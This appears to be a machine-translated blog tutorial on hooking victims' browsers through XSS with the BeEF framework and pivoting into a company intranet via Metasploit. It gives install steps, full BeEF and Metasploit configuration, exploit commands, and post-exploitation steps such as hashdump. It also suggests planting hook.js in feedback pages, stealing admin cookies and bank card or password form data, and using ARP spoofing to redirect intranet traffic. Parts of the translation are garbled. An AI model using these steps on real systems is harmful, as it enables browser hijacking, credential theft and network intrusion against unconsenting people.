Intranet penetration 1: Use the Xss vulnerability to access the Intranet
0x01: Popular Science
Beef is currently The most popular WEB Framework attack platform in Europe and America. Its full name is: The Browser Exploitation Framework Project. beef uses a simple XSS vulnerability to write JavaScript (hook. js) controls the browser of the target host, obtains detailed information about the host through the browser of the target host, and further scans the Intranet. In combination with metasploit, it is definitely a killer of Intranet penetration.
0x02 Installation
Beef is not installed in Kali linux by default. You must install it on your own.
apt-get updateapt-get install beef-xss
0x03 getting started
0x03. 1 start
Main directory:
/Usr/share/beef-xss
cd /usr/share/beef-xss./beef
127.0.0.1: 3000/ui/pannel
Account Password
Beef/beef
Demos: Beef-Xss ip: 3000/demos/butcher/index.html
Test whether the network communication between the two hosts is normal:
Access the Beef demo page
The demo page is embedded with hook. js access-> zhongzhao
0x04 Trojan:
Add a script tag to the normal page to embed malicious scripts.
In actual penetration (a public IP address is required), how can we allow victims to access the page with hook. js embedded?
Website feedback page, report page case: the use of Xss fell into the background of Baidu Complaint Center
Of course, this student uses the Xss platform instead of beef. With Beef, not only can the Cookie of the background Administrator be obtained, but also Metasploit can be used as a stepping stone through the Administrator's host browser, enter the company intranet.
Online Browersers-> right-click and choose Use As Proxy.
Combined with ARP attacks and MITM man-in-the-middle attacks, all the Http request redirection in the internal network is basically... (here is a smile you know)
Beef background detected that there was a host going online (it felt like the gray pigeons that were playing that year, shangxing =. = Bytes)
Through the browser, we can see a lot of information about the target host:
Browser information: name VERSION: basic information of Browser UA StringBrowser PlatformWindows size plug-in: FlashVBS script Web SockQuick Time... api info Cookie OS info Date hardware info Cpu (32/64) screen resolution support Touch Screen
And So On
Test with Firefox
Beef function module components
Common functions/modules
1 2 3 4 5 Browser: Get the Browser information -- Hooked Domain ----- Get Cookie Get client Cookie information execute a command to display the Cookie on the right; ----- Get From Value Get the form information submitted on the page: the bank card information intercepted and the user name and password on the registration page; ----- Redirect Browser redirection
After implementation, the target browser will be redirected to bobao.360.cn to access any website. during actual penetration, ARP attacks will be carried out on the Intranet, redirect all Http request traffic in the Intranet to the page embedded with the Hook malicious script... (show a lustful smile here)
Chrome Extensions: Debug: Test Http request Exploits: attack Host by exploiting browser vulnerabilities: Get victim Host information Mtasploit: penetration with Metasploit, which is also the focus of this article. Network: Perform Doser, ping, DNS enumeration, port scanning, etc. Social Enhineering: Social engineering module
Interaction between 0x05 and Metasploit
Beef configuration file
/Usr/share/beef-xss
/Config. yaml
metasploit:enable: false
Change
metasploit:enable: true
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net# Browser Exploitation Framework (BeEF) - http://beefproject.com# See the file 'doc/COPYING' for copying permission## BeEF Configuration filebeef: version: '0.4.4.5-alpha' debug: false restrictions: # subnet of browser ip addresses that can hook to the framework permitted_hooking_subnet: "0.0.0.0/0" # subnet of browser ip addresses that can connect to the UI # permitted_ui_subnet: "127.0.0.1/32" permitted_ui_subnet: "0.0.0.0/0" http: debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace. host: "0.0.0.0" port: "3000" # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results. # It's not advised to decrease it with tons of hooked browsers (more than 50), # because it might impact performance. Also, enable WebSockets is generally better. xhr_poll_timeout: 5000 # if running behind a nat set the public ip address here #public: "" #public_port: "" # port setting is experimental # DNS dns_host: "localhost" dns_port: 53 panel_path: "/ui/panel" hook_file: "/hook.js" hook_session_name: "BEEFHOOK" session_cookie_name: "BEEFSESSION" # Allow one or multiple domains to access the RESTful API using CORS # For multiple domains use: "http://browserhacker.com, http://domain2.com" restful_api: allow_cors: false cors_allowed_domains: "http://browserhacker.com" # Prefer WebSockets over XHR-polling when possible. websocket: enable: false secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF port: 61985 # WS: good success rate through proxies secure_port: 61986 # WSSecure ws_poll_timeout: 1000 # poll BeEF every second # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header) web_server_imitation: enable: true type: "apache" #supported: apache, iis # Experimental HTTPS support for the hook / admin / all other Thin managed web services https: enable: false # In production environments, be sure to use a valid certificate signed for the value # used in beef.http.dns_host (the domain name of the server where you run BeEF) key: "beef_key.pem" cert: "beef_cert.pem" database: # For information on using other databases please read the # README.databases file # supported DBs: sqlite, mysql, postgres # NOTE: you must change the Gemfile adding a gem require line like: # gem "dm-postgres-adapter" # or # gem "dm-mysql-adapter" # if you want to switch drivers from sqlite to postgres (or mysql). # Finally, run a 'bundle install' command and start BeEF. driver: "sqlite" # db_file is only used for sqlite db_file: "db/beef.db" # db connection information is only used for mysql/postgres db_host: "localhost" db_port: 5432 db_name: "beef" db_user: "beef" db_passwd: "beef123" db_encoding: "UTF-8" # Credentials to authenticate in BeEF. Used by both the RESTful API and the Admin_UI extension credentials: user: "beef" passwd: "beef" # Autorun modules as soon the browser is hooked. # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically. autorun: enable: true # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify allow_user_notify: true crypto_default_value_length: 80 # Enable client-side debugging client: debug: false # You may override default extension configuration parameters here extension: requester: enable: true proxy: enable: true metasploit: enable: true social_engineering: enable: true evasion: enable: false console: shell: enable: false ipec: enable: true
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net# Browser Exploitation Framework (BeEF) - http://beefproject.com# See the file 'doc/COPYING' for copying permission## Enable MSF by changing extension:metasploit:enable to true# Then set msf_callback_host to be the public IP of your MSF server## Ensure you load the xmlrpc interface in Metasploit# msf > load msgrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.# Also always use the IP of your machine where MSF is listening.beef: extension: metasploit: name: 'Metasploit' enable: true host: "172.16.244.129" port: 55552 user: "msf" pass: "abc123" uri: '/api' ssl: false ssl_version: 'SSLv3' ssl_verify: true callback_host: "172.16.244.129" autopwn_url: "autopwn" auto_msfrpcd: false auto_msfrpcd_timeout: 120 msf_path: [ {os: 'osx', path: '/opt/local/msf/'}, {os: 'livecd', path: '/opt/metasploit-framework/'}, {os: 'bt5r3', path: '/opt/metasploit/msf3/'}, {os: 'bt5', path: '/opt/framework3/msf3/'}, {os: 'backbox', path: '/opt/metasploit3/msf3/'}, {os: 'win', path: 'c:\\metasploit-framework\\'}, {os: 'custom', path: '/usr/share/metasploit-framework/'} ]
Modify the host callback_host parameter to the beef host IP address.
Restart ipvsq, metasploit, and service
Service postgresql restart & service metasploit restart
Msfconsole # Start Metasploit 1 load msgrpc ServerHost = 172.16.244.129 Pass = abc123
Restart Beef
Start beef. The following message is displayed: 246 metasploit EXP has been loaded. MSF should have 500 or 600 EXP updated to the latest version.
Enter the Beef background (inexplicably 245 =. = !)
Use exploit/windows/browser/ie_execcommand_uafshow optionsset srvhost 172.16.244.129exploit/run
The target is forcibly redirected to the monitored URL.
MSF successfully monitors the Vulnerability (however, it seems that the vulnerability has been supplemented by XP installed on the virtual machine, so no session is generated)
If XP is not patched, this EXP vulnerability exists. A session is generated.
Session-I 1
Screenshot: capture the screen of the victim to a local file
View System Information in sysinfo
Hashdump dump user Hash of the target host